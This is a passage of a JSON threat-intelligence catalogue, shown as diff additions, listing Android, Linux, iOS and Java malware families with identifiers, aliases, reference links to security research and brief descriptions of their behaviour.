+ "uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8",
+ "value": "Triada",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_001",
+ "https://twitter.com/illegalFawn/status/826775250583035904"
+ ]
+ },
+ "uuid": "bbd5a32e-a080-4f16-98ea-ad8863507aa6",
+ "value": "Unidentified APK 001",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.unidentified_002"
+ ]
+ },
+ "uuid": "afb6a7cc-4185-4f19-8ad4-45dcbb76e544",
+ "value": "Unidentified APK 002",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.viper_rat",
+ "https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/",
+ "https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/"
+ ]
+ },
+ "uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9",
+ "value": "Viper RAT",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.wirex",
+ "https://www.flashpoint-intel.com/blog/wirex-botnet-industry-collaboration/",
+ "https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/"
+ ]
+ },
+ "uuid": "77f2254c-9886-4eed-a7c3-bbcef4a97d46",
+ "value": "WireX",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xbot",
+ "https://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/",
+ "https://blog.avast.com/2015/02/17/angry-android-hacker-hides-xbot-malware-in-popular-application-icons/"
+ ]
+ },
+ "uuid": "4cfa42a3-71d9-43e2-bf23-daa79f326387",
+ "value": "Xbot",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.xrat",
+ "https://blog.lookout.com/xrat-mobile-threat"
+ ]
+ },
+ "uuid": "a8f167a8-30b9-4953-8eb6-247f0d046d32",
+ "value": "XRat",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.zoopark",
+ "https://securelist.com/whos-who-in-the-zoo/85394",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf"
+ ]
+ },
+ "uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3",
+ "value": "ZooPark",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "Qysly"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/apk.ztorg",
+ "https://blog.fortinet.com/2017/03/15/teardown-of-a-recent-variant-of-android-ztorg-part-1",
+ "http://blog.fortinet.com/2017/03/08/teardown-of-android-ztorg-part-2",
+ "https://securelist.com/ztorg-from-rooting-to-sms/78775/"
+ ]
+ },
+ "uuid": "9fbf97c0-d87a-47b0-a511-0147a58b5202",
+ "value": "Ztorg",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16",
+ "https://news.drweb.com/show/?c=5&i=10193&lng=en"
+ ]
+ },
+ "uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8",
+ "value": "Irc16",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "gayfgt",
+ "Gafgyt",
+ "qbot",
+ "torlus",
+ "lizkebab"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/",
+ "https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/",
+ "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf"
+ ]
+ },
+ "uuid": "81917a93-6a70-4334-afe2-56904c1fafe9",
+ "value": "Bashlite",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "CDorked.A"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked",
+ "https://www.symantec.com/security-center/writeup/2013-050214-5501-99",
+ "https://blogs.cisco.com/security/linuxcdorked-faqs",
+ "https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/",
+ "https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/",
+ "https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html"
+ ]
+ },
+ "uuid": "bb9eaaec-97c9-4014-94dd-129cecf31ff0",
+ "value": "CDorked",
+ "description": "This is in the same family as eBury, Calfbot, and is also likely related to DarkLeech"
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.chapro",
+ "http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
+ "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a"
+ ]
+ },
+ "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b",
+ "value": "Chapro",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer",
+ "https://github.com/pooler/cpuminer"
+ ]
+ },
+ "uuid": "8a42a699-1746-498b-a558-e7113bb916c0",
+ "value": "Cpuminer",
+ "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury",
+ "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
+ "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf",
+ "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
+ "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/"
+ ]
+ },
+ "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5",
+ "value": "Ebury",
+ "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/"
+ ]
+ },
+ "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864",
+ "value": "Erebus",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4",
+ "https://www.recordedfuture.com/chinese-cyberespionage-operations/"
+ ]
+ },
+ "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60",
+ "value": "ext4",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime",
+ "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf",
+ "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
+ "https://x86.re/blog/hajime-a-follow-up/",
+ "http://blog.netlab.360.com/hajime-status-report-en/",
+ "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things",
+ "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461",
+ "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/",
+ "https://github.com/Psychotropos/hajime_hashes"
+ ]
+ },
+ "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489",
+ "value": "Hajime",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai",
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/"
+ ]
+ },
+ "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743",
+ "value": "Hakai",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "HNS"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek",
+ "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/",
+ "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
+ "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/",
+ "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/",
+ "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/",
+ "https://blog.netlab.360.com/hns-botnet-recent-activities-en/"
+ ]
+ },
+ "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b",
+ "value": "Hide and Seek",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "IoTroop",
+ "Reaper"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper",
+ "https://research.checkpoint.com/new-iot-botnet-storm-coming/",
+ "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/",
+ "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm",
+ "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/"
+ ]
+ },
+ "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2",
+ "value": "IoT Reaper",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx",
+ "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/"
+ ]
+ },
+ "uuid": "6a4365fc-8448-4270-ba93-0341788d004b",
+ "value": "JenX",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [
+ "STD"
+ ],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten",
+ "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf"
+ ]
+ },
+ "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12",
+ "value": "Kaiten",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady",
+ "https://news.drweb.com/news/?i=10140&lng=en"
+ ]
+ },
+ "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d",
+ "value": "Lady",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey",
+ "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger"
+ ]
+ },
+ "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea",
+ "value": "MiKey",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai",
+ "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/",
+ "http://osint.bambenekconsulting.com/feeds/",
+ "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/",
+ "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf",
+ "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/",
+ "https://isc.sans.edu/diary/22786",
+ "https://github.com/jgamblin/Mirai-Source-Code",
+ "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/",
+ "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/"
+ ]
+ },
+ "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c",
+ "value": "Mirai",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes",
+ "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/"
+ ]
+ },
+ "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217",
+ "value": "Mokes",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose",
+ "http://www.welivesecurity.com/2015/05/26/moose-router-worm/",
+ "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/",
+ "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/"
+ ]
+ },
+ "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0",
+ "value": "Moose",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack",
+ "https://news.drweb.com/?i=5760&c=23&lng=en"
+ ]
+ },
+ "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50",
+ "value": "MrBlack",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari",
+ "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/",
+ "https://twitter.com/ankit_anubhav/status/1019647993547550720",
+ "https://twitter.com/360Netlab/status/1019759516789821441",
+ "https://twitter.com/hrbrmstr/status/1019922651203227653",
+ "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863",
+ "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html",
+ "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/"
+ ]
+ },
+ "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488",
+ "value": "Owari",
+ "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices."
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla",
+ "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf",
+ "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf",
+ "https://twitter.com/juanandres_gs/status/944741575837528064"
+ ]
+ },
+ "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840",
+ "value": "Penquin Turla",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/"
+ ]
+ },
+ "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7",
+ "value": "Persirai",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2",
+ "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/"
+ ]
+ },
+ "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d",
+ "value": "r2r2",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos",
+ "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/"
+ ]
+ },
+ "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5",
+ "value": "Rakos",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex",
+ "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/",
+ "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/"
+ ]
+ },
+ "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b",
+ "value": "Rex",
+ "description": ""
+ },
+ {
+ "meta": {
+ "synonyms": [],
+ "type": [],
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori",
+ "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/",
+ "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori",
+ "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/",
+ "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/",
+ "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/",
+ "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/"
+ ]
+ },
+ "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0",
+ "value": "Satori",
+ "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361)."
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", + "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" + ] + }, + "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", + "value": "ShellBind", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", + "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" + ] + }, + "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", + "value": "Shishiga", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", + "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" + ] + }, + "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", + "value": "Spamtorte", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", + "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" + ] + }, + "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", + "value": "SSHDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", + "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" + ] + }, + "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", + "value": "Stantinko", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", + "https://blog.avast.com/new-torii-botnet-threat-research" + ] + }, + "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", + "value": "Torii", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + 
"refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", + "http://paper.seebug.org/345/" + ] + }, + "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", + "value": "Trump Bot", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Amnesia", + "Radiation" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", + "https://www.8ackprotect.com/blog/big_brother_is_attacking_you", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", + "http://get.cyberx-labs.com/radiation-report" + ] + }, + "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", + "value": "Tsunami", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" + ] + }, + "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", + "value": "Turla RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Espeon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", + "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", + "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" + ] + }, + "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", + "value": "Umbreon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", + "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", + "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", + "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", + 
"https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", + "https://blog.talosintelligence.com/2018/05/VPNFilter.html", + "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", + "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" + ] + }, + "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", + "value": "elf.vpnfilter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" + ] + }, + "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", + "value": "elf.wellmess", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", + "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", + "https://news.drweb.com/show/?i=2679&lng=en&c=14" + ] + }, + "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", + "value": "Wirenet", + "description": "" + }, + { + "meta": { + "synonyms": [ + "splm", + "chopstick", + "fysbis" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", + "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", + "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/" + ] + }, + "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", + "value": "X-Agent", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", + "https://twitter.com/michalmalik/status/846368624147353601" + ] + }, + "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", + "value": "Xaynnalc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", + "https://en.wikipedia.org/wiki/Xor_DDoS", + "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", + "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html" + ] + }, + "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", + "value": "XOR DDoS", + "description": "Linux DDoS C&C Malware" + }, + { + "meta": { + "synonyms": [ + "darlloz" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", + "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" + ] + }, + "uuid": "9218630d-0425-4b18-802c-447a9322990d", + "value": "Zollard", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", + "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + ] + }, + "uuid": "8269e779-db23-4c94-aafb-36ee94879417", + "value": "DualToy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", + "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" + ] + }, + "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", + "value": "GuiInject", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", + "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" + ] + }, + "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", + "value": 
"WireLurker", + "description": "The iOS malware that is installed over USB by osx.wirelurker" + }, + { + "meta": { + "synonyms": [ + "AlienSpy", + "JSocket", + "Frutas", + "UNRECOM", + "JBifrost", + "Sockrat" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", + "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", + "http://malware-traffic-analysis.net/2017/07/04/index.html", + "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", + "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", + "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" + ] + }, + "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", + "value": "AdWind", + "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. 
Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware" + }, + { + "meta": { + "synonyms": [ + "Trupto" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", + "https://objective-see.com/blog/blog_0x28.html", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + ] + }, + "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", + "value": "CrossRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Jacksbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", + "https://github.com/java-rat", + "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", + "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/" + ] + }, + "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", + "value": "jRAT", + "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io." 
